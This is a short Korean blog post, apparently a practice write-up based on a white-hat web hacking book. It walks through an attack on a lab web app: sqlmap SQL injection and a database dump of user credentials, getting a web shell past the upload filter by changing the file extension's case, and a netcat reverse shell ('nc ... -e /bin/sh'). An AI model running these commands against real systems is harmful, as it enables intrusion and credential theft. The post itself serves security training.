본문 바로가기
보안

Chapter 18. 실전 모의해킹

qbang 2019. 3. 14.

 

최종 실습

 

1. 정보 수집

 

 

 

- 파라미터 값이 달라지는 것을 발견

 

 

 

2. SQL 인젝션 공격

 

 

 

- ‘을 입력했을 때 SQL 형식 관련 에러가 발생하는 것을 볼 수 있음

 

sqlmap -u “http://192.68.37.133/cat.php?id=1’

 

 

 

- 위 명령어를 통해 sqlmap을 실행시켜 인젝션 공격이 가능한 부분을 탐색, 굵게 표시된 부분을 보니 id 파라미터가 들어가는 곳이 취약

 

 

 

- sql 인젝션 공격과 xss 공격이 가능한 것을 확인

 

sqlmap -u "http://192.168.37.133/cat.php?id=1" --current-db

 

 

 

현재 DB의 이름을 알아내고,

 

sqlmap -u "http://192.168.37.133/cat.php?id=1" -D photoblog --dump

 

 

 

 

 

- DB 내용을 덤프시키고, USER 테이블로부터 사용자 정보를 획득

 

 

 

3. 파일 업로드 공격

 

 

 

- 위에서 획득한 정보를 통해 로그인

 

 

 

 

 

- New picture에서 [add]를 통해 webshell.php를 업로드 해봤으나 실패

 

mv webshell.php webshell.PHP

 

 

 

 

 

- 웹쉘 확장자명을 바꿔서 업로드 성공

 

 

 

 

- HOME에서 페이지 소스 보기를 클릭하고 쉘이 올라간 경로를 찾음, 그 경로에 접속

 

 

 

- 웹쉘에 표시된 폼을 통해 정보 획득

 

 

 

4. 리버스 쉘 침투

 

nc -lvnp 4000

 

- 터미널 하나에 리스닝 포트 열어두기

 

nc 1922.168.37.130 4000 -e /bin/sh

 

 

 

- 웹 쉘에 해당 명령어 입력하면 리스닝 포트에서 접속이 이루어진 것을 확인할 수 있음

 

해당 포스팅은 '화이트해커를 위한 웹 해킹의 기술' 책 내용을 바탕으로 작성되었습니다.

댓글